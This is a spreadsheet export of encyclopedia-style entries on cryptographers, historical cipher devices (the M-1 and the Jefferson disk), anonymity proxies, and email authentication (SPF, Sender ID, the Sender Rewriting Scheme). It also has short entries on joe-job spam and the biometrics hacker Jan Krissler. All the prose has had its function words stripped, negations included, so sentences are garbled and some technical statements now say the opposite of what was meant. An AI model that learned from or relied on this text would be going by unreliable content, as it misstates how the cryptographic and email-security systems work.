described friedrich bauer extreme nazi true genius. hans rohrbach german, mathematician aa/pers german department state, civilian diplomatic cryptological agency. wolfgang franz german, mathematician worked okw. later significant discoveries topology. werner weber german, mathematician okw. georg aumann german, mathematician okw. doctoral student friedrich bauer. otto leiberich german, mathematician worked linguist cipher department high command wehrmacht. alexander aigner german, mathematician worked okw. erich hüttenhain german, chief cryptanalyst (section cipher department high command wehrmacht. german mathematician cryptanalyst tested number german cipher machines found breakable. wilhelm fenner german, chief cryptologist director cipher department high command wehrmacht. walther fricke german, worked alongside erich hüttenhain cipher department high command wehrmacht. mathematician, logician, cryptanalyst linguist. fritz menzer german. inventor sg39 sg41. other pre-computer rosario candela, architect notable amateur cryptologist authored books taught classes subject civilians hunter college. claude elwood shannon, founder information theory, proved one-time unbreakable. modern also: category:modern cryptographers exhaustive list. symmetric-key algorithm inventors ross anderson, university cambridge, co-inventor serpent cipher. paulo barreto, brazilian, university paulo, co-inventor whirlpool hash function. george blakley, independent inventor secret sharing. biham, israel, co-inventor serpent cipher. coppersmith, co-inventor mars ciphers. joan daemen, belgian, co-developer rijndael became advanced encryption standard (aes), keccak became sha-3. horst feistel, german, ibm, namesake feistel networks lucifer cipher. lars knudsen, denmark, co-inventor serpent cipher. ralph merkle, inventor merkle trees. bart preneel, belgian, co-inventor ripemd-160. vincent rijmen, belgian, co-developer rijndael became advanced encryption standard (aes). ronald rivest, mit, inventor cipher series algorithm series. bruce schneier, inventor blowfish co-inventor twofish threefish. xuejia lai, co-inventor international data encryption algorithm (idea). shamir, israel, weizmann institute, inventor secret sharing. asymmetric-key algorithm inventors leonard adleman, usc, rsa. david chaum, inventor blind signatures. clifford cocks, gchq first inventor rsa, fact remained secret 1997 unknown rivest, shamir, adleman. whitfield diffie, (public) co-inventor diffie-hellman key-exchange protocol. taher elgamal, (born egyptian), inventor elgamal discrete cryptosystem. shafi goldwasser, israel, weizmann institute, co-discoverer zero-knowledge proofs, semantic security. martin hellman, (public) co-inventor diffie-hellman key-exchange protocol. neal koblitz, independent co-creator elliptic curve cryptography. alfred menezes, co-inventor mqv, elliptic curve technique. silvio micali, (born italian), mit, co-discoverer zero-knowledge proofs, semantic security. victor miller, independent co-creator elliptic curve cryptography. david naccache, inventor naccache–stern cryptosystem naccache–stern knapsack cryptosystem. moni naor, co-inventor naor–yung encryption paradigm security. rafail ostrovsky, co-inventor oblivious ram, single-server private information retrieval, proactive cryptosystems. pascal paillier, inventor paillier encryption. michael rabin, israel, inventor rabin encryption. ronald rivest, mit, rsa. shamir, israel, weizmann institute, rsa. moti yung, co-inventor naor–yung encryption paradigm security, threshold cryptosystems, proactive cryptosystems. cryptanalysts joan clarke, english cryptanalyst numismatist best known work code-breaker bletchley park second world war. ross anderson, biham, israel, co-discoverer differential cryptanalysis related-key attack. matt blaze, boneh, stanford university. niels ferguson, netherlands, co-inventor twofish fortuna. goldberg, canada, university waterloo. lars knudsen, denmark, dtu, discovered integral cryptanalysis. paul kocher, discovered differential power analysis. mitsuru matsui, japan, discoverer linear cryptanalysis. david wagner, berkeley, co-discoverer slide boomerang attacks. xiaoyun wang, people's republic china, known sha-1 hash function attacks. alex biryukov, university luxembourg, known impossible differential cryptanalysis slide attack. moti yung, kleptography. algorithmic number theorists daniel bernstein, developed several popular algorithms, fought government restrictions bernstein united states. coppersmith, dorian goldfeld, along michael anshel iris anshel invented anshel–anshel–goldfeld exchange algebraic eraser. they also helped found braid group cryptography. theoreticians mihir bellare, ucsd, co-proposer random oracle model. boneh, stanford. gilles brassard, canada, université montréal. co-inventor quantum cryptography. claude crépeau, canada, mcgill university. oded goldreich, israel, weizmann institute, author foundations cryptography. shafi goldwasser, israel. silvio micali, mit. rafail ostrovsky, ucla. charles rackoff, co-discoverer zero-knowledge proofs. oded regev, inventor learning errors. phillip rogaway, davis, co-proposer random oracle model. amit sahai, ucla. gustavus simmons, sandia, authentication theory. moti yung, google. government cryptographers clifford cocks, gchq, secret inventor algorithm later known rsa. james ellis, gchq, secretly proved possibility asymmetric encryption. lowell frazer, usa, national security agency julia wetzel, usa, national security agency malcolm williamson, gchq, secret inventor protocol later known diffie–hellman exchange. cryptographer businesspeople bruce schneier, founder counterpane internet security, inc. cryptography author. scott vanstone, canada, founder certicom elliptic curve cryptography proponent. also cryptography references external links list cryptographers' home pages</t>
  </si>
  <si>
    <t>Japanese M-1 cipher machine</t>
  </si>
  <si>
    <t>japanese cipher machine mechanical device japanese used performing cryptography sometime 1930s. more specifically used naval attaches. called orange machine. cryptographically similar cipher; broken agnes driscoll (madame references</t>
  </si>
  <si>
    <t>Java Anon Proxy</t>
  </si>
  <si>
    <t>java anon proxy (jap) also known jondonym, proxy system designed allow browsing revocable pseudonymity. originally developed part project technische universität dresden, universität regensburg privacy commissioner state schleswig-holstein. client-software written java programming language. service closed since august 2021. cross-platform free, sends requests cascade mixes data streams multiple users order obfuscate data outsiders. jondonym available platforms support java. furthermore, anondroid jondonym proxy client android. design jondonym client program allows user choose among several cascades (i.e. group anonymization proxies) offered independent organisations. users choose operators trust, won't. this different peer-to-peer based anonymity networks like i2p, whose anonymization proxies anonymous themselves, means users rely unknown proxy operators. however, means relays used jondonym-mediated connections known identified, therefore potentially targeted easily hackers, governmental agencies lobbying groups. this example issues mentioned below, court orders essentially gave control whole system german government. discussed below, solutions like international distribution relays additional somewhat mitigate loss independence. speed availability service depends operators mixes cascades, therefore varies. more users cascade improve anonymity, large number users might diminish speed bandwidth available single user. cost, name change commercial service jondonym (and still free, since financial backing original university research project june 2007, startup, jondos gmbh, founded members original project team. jondos gmbh taken development continues work improved blocking resistance function would make easier users restrictive countries connection system. consequence, client renamed jondo service an.on jondonym. jondonym cascades mostly operated smes multiple countries cascades always include three servers advanced security. contractors jondos gmbh must ensure sufficient throughput mixes, anonymous browsing speeds 30-50 kbit/s possible. cost free cascades still operation, although offer latency, multiple mixes cascade guaranteed bandwidth commercial ones privacy online activities user revealed mixes cascade work together keeping files correlating logs. however, operators sign voluntary commitment keep logs, observer difficult infiltrate operators long cascade. july 2003, german obtained warrant force dresden operators access specific address, hosting child pornography. an.on decided introduce crime detection function server software order make possible. feature made transparent publishing changed source code august 2003, subsequently criticized many users. dresden mix, feature continues part software today. tracing activities back past still technically possible operators, anonymity extends time-point surveillance court order issued. pointed though feature covered an.on threat model security leak itself. reaction threat local authorities, system spread internationally. mixes cascade spread several countries, enforcement agencies countries would work together reveal someone's identity. an.on publishes every year number successful unsuccessful surveillance court orders. further research done an.on make crime detection functionality privacy-friendly.since 2006, jondonym also used client network since 2006 also mixminion network. these features still early stage available beta version software. also references external links jondonym home page an.on project home page guide easily fast: "surfing anonymously within minutes"</t>
  </si>
  <si>
    <t>Jeevan Pramaan</t>
  </si>
  <si>
    <t>jeevan pramaan life certificate program affiliated aadhaar people pensions. started prime minister narendra modi november 2014.the certificate made people receive pensions central state governments government organisations.jeevan pramaan made department electronics government india.the jeevan pramaan software downloaded https://jeevanpramaan.gov.in/ android devices. alternatively process carried many jeevan pramaan centres. electronic jeevan praaman certificate obtained pension beneficiary using software fingerprint iris scan, using aadhaar platform authentication. certificate made available electronically pension disbursing agency.eastern railway launched jeevan pramaan centre facilitate pensioners zonal headquarter fairlie place, kolkata august 2015. service extended additional divisions, workshops major establishments jurisdiction eastern railway. references</t>
  </si>
  <si>
    <t>Jefferson disk</t>
  </si>
  <si>
    <t>jefferson disk, also called bazeries cylinder wheel cypher named thomas jefferson, cipher system using wheels disks, letters alphabet arranged around edge. order letters different disk usually ordered randomly. each disk marked unique number hole center disks allows stacked axle. disks removable mounted axle order desired. order disks cipher key, sender receiver must arrange disks predefined order. jefferson's device disks.once disks placed axle agreed order, sender rotates disk desired message spelled row. then, sender copy text disks contains plaintext message. recipient arrange disks agreed-upon order, rotate disks spell encrypted message row, look around rows plaintext message, i.e. that's unreadable. there extremely small chance readable messages, easily avoided checking. jefferson disk invented thomas jefferson 1795, method independently invented improved upon commandant etienne bazeries, become well known broke great cipher, rossignols, century jefferson's work. system used united states army 1923 1942 m-94. aided efforts type secret messaging military government officials would know interpret. example operation encrypt message, encrypter rotates disks produce plaintext message along "row" stack disks, selects another ciphertext. decrypt message, decrypter rotates disks cylinder produce ciphertext along row. decryption easier encrypter decrypter know offset row, necessary since decrypter look around cylinder find makes sense. example, simplified "toy" bazeries cylinder using disks might organized shown below, disk "unwrapped" line marked designating number: "key", sequence disks, bazeries cylinder 7,9,5,10,1,6,3,8,2,4 encrypter wants send message "retreat now" decrypter, encrypter rearranges disks rotates disk obtain plaintext, shown left, spacing added clarity: encrypter selects ciphertext sixth cylinder plaintext. this ciphertext also highlighted spacing, gives: omkegwpdfn when decrypter gets ciphertext, rearrange disks cylinder arrangement, rotate disks give ciphertext, read plaintext rows ciphertext, look cylinder makes sense. basis later military ciphers bazeries cylinder basis "m-94" cipher machine, introduced 1922 derived work parker hitt. 1914, hitt experimented bazeries device, building prototype using slides wooden frame, cipher alphabets printed twice consecutively slides, another using disks wood. forwarded experiments signal corps chain command, 1917 joseph mauborgne refined scheme, final result m-94. m-94 used aluminium disks spindle. used army, coast guard, radio intelligence division federal communications commission early world army changed back hitt's original slide scheme "m-138-a" cipher machine, introduced 1930s used navy state department world m-138-a featured strips, selected cipher session. improvement security state department, interwar years used insecure codes, even case standard commercial telegraph code. cryptanalysis bazeries cylinder relatively strong system time (compared many systems use), etienne bazeries, french military cryptanalyst, said regarded indecipherable. "pers code-breaking group german foreign office cracked m-138-a 1944. however, time americans sophisticated cipher systems operation. french cryptographer gaetan viaris (aka marquis gaetan henri leon viarizio lesegno) famous first printing cipher devices (1874), solved bazeries cylinder 1893. major weakness bazeries cylinder offset plaintext letter ciphertext letter cipher alphabet disk exactly same. example shown above, offset letters. example, cryptanalyst captured disk bazeries cylinder described example above, enough permit decipher messages since also know key, arrangement disks cylinder. number possible permutations disks example bazeries cylinder 3,628,800 large size number, trial error testing arrangement disks difficult perform hand. this article, earlier version incorporates material greg goebel's codes, ciphers, codebreaking. sources codebreakers, david kahn, 1967, 192–195 "monticello." wheel cipher. accessed april 2022. https://www.monticello.org/site/research-and-collections/wheel-cipher. riverbank publication number several machine ciphers methods solution, william friedman, 1918, methods solution ciphers, publications 15-22, rufus long digital library cryptography, george marshall library, 1917-1922,: "rossignols." wikipedia. wikimedia foundation, november 2021. https://en.wikipedia.org/wiki/rossignols. external links thomas jefferson's wheel cipher</t>
  </si>
  <si>
    <t>Sendio</t>
  </si>
  <si>
    <t>sendio newport beach, california-based e-mail security company. privately held company founded 2003 golan, currently serves company's president cto. using sender address verification technology, sendio provides e-mail security solution stops spam, viruses, malware, phishing attacks unsolicited e-mail reaching e-mail inbox. february 2007, sendio received million venture capital funding vicente capital, shepherd ventures athenian venture partners. former microsoft rick devenuti appointed board directors sendio 2007. sendio customers include central dupage hospital, arnerich massena, inc., leading hotels world, penn state sentinel real estate corporation. technology sendio's e-mail security platform, (formerly named i.c.e. box) appliance solution eliminates spam viruses. e-mail security platform (esp) uses verification model first-time, unsolicited senders scans viruses phishing directions. outbound message recipients added user's personal accept contact list. once authenticated, subsequent messages sender assured reaching recipient's inbox.esp combines silverlisting, technology includes low-level smtp tests determine legitimacy sending e-mail server, sender address verification, verifies authenticity first-time, unsolicited senders, introduces human element process. this combination silverlisting prevents 100% spam.esp employs verification model similar embraced millions social networking users, facebook linkedin, “buddy” list model used leading instant messaging providers skype, yahoo!, google aol. recognition sendio's i.c.e. named "best best" product year 2006 government computer news email integrity award winner 2007 tomorrow's technology today.sendio named emerging vendor magazine security technology sector june 2008. references external links official website http://ferris-free-news.blogspot.com/2008/10/oct-15-daily-compliance-messaging-news.html http://www.insurancetech.com/security/showarticle.jhtml?articleid=211201539 http://www.itexaminer.com/sendio-launches-esp.aspx http://www.govtech.com/gt/421319?topic=117691 http://hosted-communications.tmcnet.com/topics/broadband-comm/articles/43279-sendio-launches-e-mail-security-solution.htm http://www.socaltech.com/sendio_enhances_email_appliance/s-0017927.html</t>
  </si>
  <si>
    <t>Sender Rewriting Scheme</t>
  </si>
  <si>
    <t>sender rewriting scheme (srs) scheme bypassing sender policy framework's (spf) methods preventing forged sender addresses. forging sender address also known email spoofing. background number cases, including change email address mailing lists, message transfer agent (mta) accepts email message destined local mailbox needs forwarded. cases, question arises deserves receive related bounce message. general, either author, person entity administers forwarding itself. sending bounces author administratively simpler used accomplished keeping original envelope sender. however, author address subject strict policy (-all) target happens enforce forwarding transaction rejected. workaround, possible synthesize temporary bounce address direct bounce back current mta. scheme provides recovering original envelope address, bounce arrive, forwarded along reverse path—with empty envelope sender time. while workarounds, fairly general one. notion reversing path resembles original routing dispositions email, below. please note using protocol fails alignment check dmarc record, design. your dmarc record still pass dkim check. rewriting scheme form variable envelope return path (verp) inasmuch encodes original envelope sender local part rewritten address. consider example.com forwarding message originally destined bob@example.com address &lt;bob@example.net&gt;: original envelope sender: alice@example.org envelope recipient: bob@example.com rewritten envelope sender: srs0=hhh=tt=example.org=alice@example.com envelope recipient: bob@example.net example adapted shevek. with respect verp, local part (alice) moved domain name (example.org), adding prefix (srs0), hash (hhh), timestamp (tt). that reflects operational difference: eventual bounces back verp address handled within rewriting domain, forged messages unsubscribe users, kind abuse seen significant exploits last decades. instead, aims remailing possible bounce back alice, forged bounces become alluring technique injecting spam apparently originating rewriting sender. local part, case alice, moved contain equal signs (=), putting extremity rewritten local part makes latter parsable. timestamp (tt) one-day resolution order make address invalid days. computed unix time⁄(60×60×24) 210, stored base32 characters, recycling period years. hash-based message authentication code (hhh) computed local secret, part used; example, storing first characters base64 representation provides bits security. hash checked domain generated case bounce arrives. prefix, srs0, meant disambiguate regular addresses rewritten ones; example.com ensure none users email address starting srs0=.srs provides another prefix, srs1, used rewriting already rewritten address, multi-hop scenario. example.net forward message turn, spare adding another timestamp repeating original local part (alice). that forwarder adds hash (hhh) domain name preceding forwarder: further rewritten envelope sender: srs1=hhh=example.com==hhh=tt=example.org=alice@example.net envelope recipient: bob@further.example database alternative using database definitely control growth rewritten addresses, since sufficient unique rewritten local part. also allows certain amount anonymity resending process, desired. however, database requires centralization single point failure. header field alternative another possibility store long rewritten address somewhere message header. dkim-signature good place, choice considerably improves security. this technique observed. unless backup mechanism, work bounce message standard format. historical background historically mail transfer agents (mtas) added host name reverse path. simple mail transfer protocol (smtp) reverse path also known mail from, paths also used outside smtp, e.g. bang paths uucp usenet (netnews). news articles still contain path header, example: path: news.server.example!other.example!not-for-mail information 5321 e-mail envelope smtp info like mail from would mail from:&lt;not-for-mail@other.example&gt; mail from:&lt;@news.server.example:not-for-mail@other.example&gt;the step reflects sender, step next mta, etc. example let's assume forwards mail mta, finally delivered. final also known mail delivery agent (mda), putting mail mailbox recipient. transforms reverse path known return-path header field: return-path:&lt;@news.server.example:not-for-mail@other.example&gt; smtp uses records forward routing. explicit source routes in... rcpt to:&lt;@news.server.example:user@destination.example&gt; ...to route mail other.example news.server.example destination.example cumbersome. make things worse sometimes (1982) style addresses mixed uucp bang paths constructs like... destination.example!user@news.server.example other.example!not-for-mail@news.server.example ...and various kludges. smtp records made essentially useless. therefore, source routing deprecated 1989 1123. special case 1123 gateways networks like uucp netnews, first sending cannot reach final receiver directly tcp. solved records necessary rewriting foreign addresses gateway. acronym mail exchanger. another special case mailing lists, list server rewrites reverse paths error handling address bounces (error messages) recipients. list server could automatically unsubscribe bouncing recipients. this type address rewriting known since still used today (rfc 5321, well 2821, updated smtp chapter 1123). last least forwarding another address always worked rewriting address forward path also known rcpt forwarding accepted responsibility forwarding mail returning potential bounce messages sender. later smtp specifications offer result codes situation: user local (attempted forward) user local (mail rejected)for privacy reasons result codes today rarely used; include forwarded (251) forwarded (551) address. meaning effect forwarding third parties identical result code error code respectively. noted 1123 deprecated source routing, implicitly also deprecated reverse routing bounces. relatively small internet back 1989, mail admins (postmasters) often knew fixed problems fly. routing bounce messages back forwarders waste time bandwidth noting problem (e.g. rejection error code) could send error message directly back sender. since 1123 forwarders third parties still rewrote rcpt address, kept mail from side effect mtas wishing accept mail forwarders generally accept mail from address. more decade later spammers started abuse flaw post-1123 smtp, today mails spam reverse paths forged. note spammers typically forge working reverse paths, many mtas reject mail callback verification plausibility checks fail reverse path. 5321, well 2821, states non-delivery reports (bounces) must sent originator indicated reverse path accepted responsibility delivery. however, bounce message suppressed original content hostile (cf. spam virus mail) message forged (rfc 5321, section note current forgery detection methods require mailbox owner supply information work. failing supply criteria make bounce message classifiable backscatter, although people mistakenly think should. open relays forwarders unlucky position regards issue, generally can't guarantee mail from address indicates originator, also can't guarantee final delivery succeed. this smtp problem caused side effect 1123 addressed spf, executive summary breaks forwarding actually that's case, fail asks receivers check border mta, later. receivers arrange forwarding works essence three strategies: checking behind border, e.g. white list forwarders reject fail, resulting bounce (smtp error 550) rewrite mail from forwarder done mailing lists)sender rewriting scheme (srs) third strategy. also sender policy framework (spf) bounce message (smtp non-delivery report) bounce address validation (batv) simple mail transfer protocol (smtp) references external links libsrs2 home page paper (pdf) historical draft meng weng wong (2003) qmail patch postsrsd home page (daemon handles postfix)</t>
  </si>
  <si>
    <t>Sender Policy Framework</t>
  </si>
  <si>
    <t>sender policy framework (spf) email authentication method designed detect forging sender addresses delivery email. alone, though, limited detecting forged sender claim envelope email, used mail gets bounced. only combination dmarc used detect forging visible sender emails (email spoofing), technique often used phishing email spam. allows receiving mail server check mail delivery mail claiming come specific domain submitted address authorized domain's administrators. list authorized sending hosts addresses domain published records domain. sender policy framework defined 7208 dated april 2014 "proposed standard". history first public mention concept 2000 went mostly unnoticed. mention made concept first attempt spf-like specification published 2002 ietf "namedroppers" mailing list dana valerie reese, unaware 2000 mention idea. next day, paul vixie posted spf-like specification list. these posts ignited interest, forming ietf anti-spam research group (asrg) mailing list, idea developed. among proposals submitted asrg "reverse (rmx) hadmut danisch, "designated mailer protocol" (dmp) gordon fecyk.in june 2003, meng weng wong merged specifications solicited suggestions others. over next months, large number changes made large community started working spf. originally stood sender permitted from sometimes also called smtp+spf; name changed sender policy framework february 2004. early 2004, ietf created marid working group tried microsoft's callerid proposal basis known sender collapsed technical licensing conflicts.the community returned original "classic" version spf. july 2005, version specification approved iesg ietf experiment, inviting community observe years following publication. april 2006, published experimental 4408. april 2014 ietf published 7208 "proposed standard". principles operation simple mail transfer protocol permits computer send email claiming source address. this exploited spammers scammers often forged email addresses, making difficult trace message back source, easy spammers hide identity order avoid responsibility. also used phishing techniques, users duped disclosing private information response email purportedly sent organization bank. allows owner internet domain specify computers authorized send mail envelope-from addresses domain, using domain name system (dns) records. receivers verifying information records reject messages unauthorized sources receiving body message. thus, principles operation similar dns-based blackhole lists (dnsbl), except uses authority delegation scheme domain name system. current practice requires records, early implementations did. record type (spf, type registered made available common software. records intended transitional mechanism time. experimental rfc, 4408, section 3.1.1, suggested spf-compliant domain name should records types". proposed standard, 7208, says "use alternative types supported spf's experimental phase discontinued".the envelope-from address transmitted beginning smtp dialog. server rejects domain, unauthorized client receive rejection message, client relaying message transfer agent (mta), bounce message original envelope-from address generated. server accepts domain, subsequently also accepts recipients body message, insert return-path field message header order save envelope-from address. while address return-path often matches originator addresses mail header header-from, necessarily case, prevent forgery addresses sender header. spammers send email pass result account domain sender policy, abuse compromised system domain. however, makes spammer easier trace. main benefit owners email addresses forged return-path. they receive large numbers unsolicited error messages auto-replies. receivers specify legitimate source addresses indicate fail result addresses, receivers checking reject forgeries, thus reducing eliminating amount backscatter. potential advantages beyond helping identify unwanted mail. particular, sender provides information, receivers pass results combination allow list identify known reliable senders. scenarios like compromised systems shared sending mailers limit use. reasons implement domain publishes record, spammers phishers less likely forge emails pretending domain, forged emails likely caught spam filters check record. therefore, spf-protected domain less attractive spammers phishers. because spf-protected domain less attractive spoofed address, less likely denylisted spam filters ultimately legitimate email domain likely through. fail forwarding breaks plain message forwarding. when domain publishes fail policy, legitimate messages sent receivers forwarding mail third parties rejected and/or bounced following occur: forwarder rewrite return-path, unlike mailing lists. next allowlist forwarder. this checks spf.this necessary obvious feature checks behind "border" (mx) receiver cannot work directly. publishers fail policies must accept risk legitimate emails rejected bounced. they test (e.g., softfail policy) satisfied results. list alternatives plain message forwarding. helo tests empty return-path used error messages auto-replies, check helo identity mandatory. with bogus helo identity result none would help, valid host names also protects helo identity. this feature always supported option receivers, later drafts including final specification recommend check helo always. this allows receivers allowlist sending mailers based helo pass, reject mails helo fail. also used reputation systems (any allow deny list simple case reputation system). implementation compliance consists three loosely related tasks: publishing policy: domains hosts identify machines authorized send email behalf. they adding additional records existing information: every domain name host record record record specifying policy used either email address helo/ehlo argument. hosts send mail record published indicate ("v=spf1 -all"). checking using information: receivers ordinary queries, typically cached enhance performance. receivers interpret information specified upon result. revising mail forwarding: plain mail forwarding allowed spf. alternatives are: remailing (i.e., replacing original sender belonging local domain) refusing (i.e., answering user local; please &lt;user@example.com&gt;) allowlisting target server, refuse forwarded message sender rewriting scheme, complicated mechanism handles routing non-delivery notifications original senderthus, issue specification information domains receivers use. records laid typical syntax, example: "v=spf1 ip4:192.0.2.0/24 ip4:198.51.100.123 -all" "v=" defines version used. following words provide mechanisms determine domain eligible send mail. "ip4" specify systems permitted send messages given domain. "-all" specifies that, previous mechanisms match, message rejected. mechanisms eight mechanisms defined: qualifiers each mechanism combined four qualifiers: pass result. this omitted; e.g., neutral result interpreted like none policy). (tilde) softfail, debugging neutral fail. typically, messages return softfail accepted tagged. (minus) fail, mail rejected (see below). modifiers modifiers allow future extensions framework. date modifiers defined 4408 widely deployed: exp=some.example.com gives name domain record (interpreted using spf's macro language) explanation fail results—typically added smtp error code. this feature rarely used. redirect=some.example.com used instead all-mechanism link policy record another domain. this modifier easier understand somewhat similar include-mechanism. error handling soon implementations detect syntax errors sender policy must abort evaluation result permerror. skipping erroneous mechanisms cannot work expected, therefore include:bad.example redirect=bad.example also cause permerror. another safeguard maximum mechanisms querying dns, i.e. mechanism except ip4, ip6, all. implementations abort evaluation result temperror takes long query times continue pretending query returned data —which called "void lookup". however, must return permerror policy directly indirectly needs queries mechanisms. addition, return permerror soon "void lookups" encountered. redirect= also counts towards processing limits.a typical helo policy v=spf1 ip4:192.0.2.0 -all execute four queries: record (spf type obsoleted 7208), aaaa mechanism record (4+) aaaa name, mechanism except first one, queries count towards limit addition example, sender ipv6 address, name names ipv4 addresses, evaluation first mechanisms already results void lookups hence permerror. note mechanisms ip4, need lookup. issues records enable rapid testing deployment, initial versions checked setting record sending domain even though record traditionally supposed free-form text semantics attached. although july 2005, iana assigned specific resource record type uptake never high, mechanisms confusing users. 2014 record discontinued spfbis working group concluded ...significant migration type foreseeable future unlikely best solution resolving interoperability issue drop support type." header limitations increasingly prevents spammers spoofing envelope-from address, many moved spoof address from field mail header, actually displayed recipient rather processed recipient's message transfer agent (mta). dkim) used together dmarc though, also check from field mail header. this called 'identifier alignment'. custom proprietary implementations required protect display name spoofing cannot utilize spf. deployment anti-spam software spamassassin version 3.0.0 assp implement spf. many mail transfer agents (mtas) support directly courier, communigate pro, wildcat, mdaemon, microsoft exchange, patches plug-ins available support spf, including postfix, sendmail, exim, qmail, qpsmtpd. 2017, eight million domains publish fail -all policies. survey published 2007, .com .net domains kind policy. 2009, continuous survey nokia research reports tested domains specify policy. these results include trivial policies like v=spf1 ?all.in april 2007, bits, division financial services roundtable, published email security recommendations members including deployment. 2008, messaging anti-abuse working group (maawg) published paper email authentication covering spf, sender domainkeys identified mail (dkim). "sender best communication practices" maawg stated: least, senders incorporate records mailing domains". 2015, messaging anti-abuse working group (maawg) revised paper email authentication covering spf, domainkeys identified mail (dkim), dmarc (dmarc). revised "sender best communication practices" maawg stated: "authentication supports transparency identifying sender(s) message, also contributing reduction elimination spoofed forged addresses". also domainkeys identified mail (dkim) author domain signing practices dmarc record syntax table references external links ietf rfc4408: sender policy framework (spf) authorizing domains email, version experimental (2006) ietf rfc6652: sender policy framework (spf) authentication failure reporting using abuse reporting format, proposed standard (2012) ietf rfc7208: sender policy framework (spf) authorizing domains email, version proposed standard (2014) libspf2 open source implementation protocol (2010) https://senderpolicyframework.com/ https://www.spfwizard.net/ (tools generation, validation configuration record)</t>
  </si>
  <si>
    <t>Sender ID</t>
  </si>
  <si>
    <t>sender historic anti-spoofing proposal former marid ietf working group tried join sender policy framework (spf) caller sender defined primarily experimental 4406, additional parts 4405, 4407 4408. principles operation sender heavily based spf, additions. sender tries improve spf: verify header addresses one) indicate claimed sending party. header addresses typically displayed user used reply emails. these header addresses different address tries verify; verifies "mail from" address, also called envelope sender. however, many similar email header fields contain sending party information; therefore sender defines 4407 purported responsible address (pra) well heuristic rules establish address many typical headers email. syntactically, sender almost identical except v=spf1 replaced spf2.0/mfrom meaning verify envelope sender address like spf. spf2.0/mfrom,pra spf2.0/pra,mfrom meaning verify envelope sender pra. spf2.0/pra meaning verify pra.the syntactical difference sender offers feature positional modifiers supported spf. practice, positional modifier specified sender implementation. practice, scheme usually offers protection email legitimate, offering real protection case spam phishing. legitimate email either familiar from: header field, case mailing lists, sender: header field. case phishing spam, however, based resent-* header fields often displayed user. effective anti-phishing tool, (mail user agent mail client) need modified display either sender return-path: header field spf. tries counter problem phishing, mfrom tries counter problem spam bounces auto-replies forged return-paths. different problems different proposed solutions. however, sender-id yield result approximately cases, according billion message analysis. standardization issues disadvantage forwarders mailing lists support modifying mail header, e.g. inserting sender resent-sender. latter violates 2822 incompatible 822.with spf, mailing lists continue work forwarders wishing support need modify smtp mail from rcpt mail. this concept new: original smtp forwarders always added host name reverse path mail from. problematic point core sender specification recommendation interpret v=spf1 policies like spf2.0/mfrom,pra instead spf2.0/mfrom. this never intended published drafts since 2003, unknown large number v=spf1 policies evaluation could cause bogus results many cases mfrom different. this problem basis appeal internet architecture board (iab). response another prior appeal iesg already noted sender cannot advance ietf standards track without addressing incompatibility must 2822.various surveys performed 2012, turned experimental proposed standard, showed fewer mail domains published specific requests using pra, compared 40~50% mail domains using spf. patents sender proposal subject controversy regarding licensing issues: microsoft holds patents parts sender used license patents terms compatible general public license considered problematic free software implementations general. october 2006, microsoft placed patents open specification promise, compatible free open source licenses, recent version license, version 3.x. also category:email authentication e-mail authentication overview marid (ietf 2004) dkim domainkeys references external links position regarding sender statement apache software foundation appeal sender id's reuse v=spf1 project (2006). debian project unable deploy sender statement debian project ietf decides sender-id issue coverage discussion slashdot sender dead water? marid working group consensus coverage discussion groklaw marid co-chairs clarify consensus statement marid close mailing list thread. sender tale open standards corporate greed? "spf: sender "sender types different countries" "sender</t>
  </si>
  <si>
    <t>Joe job</t>
  </si>
  <si>
    <t>spamming technique sends unsolicited e-mails using spoofed sender data. early jobs aimed tarnishing reputation apparent sender inducing recipients take action (see also email spoofing), typically used commercial spammers conceal true origin messages trick recipients opening emails apparently coming trusted source. origin motivation name "joe job" originated spam attack doll, webmaster joes.com, 1997. user's joes.com account removed advertising spam. retaliation, user sent spam headers forged make appear doll responsible. besides prompting angry replies, also caused joes.com fall prey denial-of-service attacks, anti-spam vigilantes thought sent mail, temporarily took site down.some e-mail jobs acts revenge like original, whether individuals organizations also spam purposes. spammers technique cycle domains around spam filters blocks. joe-jobbers could also businesses trying defame competitor spammer trying harm reputation anti-spam group filtering service. attacks media often motivated politically personal enmity. form jobs usually look like normal spam, although might also disguise types scams even legitimate (but misdirected) messages. jobbing "joeing") take different forms, incidents involve either e-mail usenet. they sometimes seen instant messaging systems well. general, jobbing seen messaging systems weak sender authentication, users assume purported sender actual one. joe-jobber imitating normal spam, simply advertise victim's product, business website. also claim victim selling illegal offensive items illegal drugs, automatic weapons child pornography increase likelihood recipient take action victim. when imitating scam, nigerian scam, phishing scheme, e-mail still feature links victim's website include contact information. instances, joe-jobber hoping recipient notice e-mail fake, mistakenly think victim behind "scam". when imitating legitimate e-mail, usually pose order confirmation. these "confirmations" credit card information, event attack differs phishing intent, methodology, simply imply recipient already bought something store (leading recipient fear credit card already charged). like "normal spam" jobs, e-mails often mention illegal activities incite recipient angry e-mails legal threats. another joe-job variation e-mail claiming victim offers "spam friendly" host e-mail server hope inciting action victim anti-spam activists. function jobs often intend capitalize general hatred spam. they usually forge "from" addresses email headers angry replies directed victim. some attacks adopt deliberately inflammatory viewpoints, intending deceive recipient believing sent victim. victims lose website hosting network connectivity complaints internet service providers, even face increased bandwidth costs server overload) increased website traffic. victim also find email blacklisted spam filters. unlike email spam, victim "fall for" even receive email question; perpetrator using innocent third parties fuel essentially amounts slander combined denial service attack. similar automated spam false headers used many viruses spambots today, selected random automated way, possible someone jobbed without human intent intervention. also agent provocateur person employed incite others commit incriminating actions backscatter (email) related phenomenon targeted directly particular victim false flag covert operation designed deceive, similar military concept sporgery posting flood articles usenet group, falsified headers. references external links text original "joe job" spam mail "joe jobs", hoaxes, snopes: recent examples. thomas, dillian, sabotage! coping with job, sitepoint. weekend ibm.net almost died, archived original 2000-10-13: instance refused terminate account.</t>
  </si>
  <si>
    <t>Jan Krissler</t>
  </si>
  <si>
    <t>krissler, better known pseudonym starbug, german computer scientist hacker. best known work defeating biometric systems, prominently iphone's touchid. also active member german european hacker community. fingerprints prominent german politicians krissler, along chaos computer club published fingerprints interior minister wolfgang schäuble means protest well proof concept. shot traces glass used schäuble using digital camera tweaked digitally. previously, schäubles ministry interior introduced biometric passports included digital copy holder's fingerprint. refined attack 2014 reproduced minister defense ursula leyen's fingerprint high resolution press photo. attack presented 2014's chaos communication congress. scientific work next activities popular papers published activist, krissler also published scientist. early works looked security biometric systems. later, krissler researched foundations fiberoptical systems development novel attacks smart cards.from 2014 onwards, work focused novel methods attacking biometric systems. internationally recognized research risks emanating high resolution smartphone cameras allowed covertly steal fingerprints. deficiencies biometric payment systems another field research.currently, krissler research assistant berlin working research group jean-pierre seifert. references</t>
  </si>
  <si>
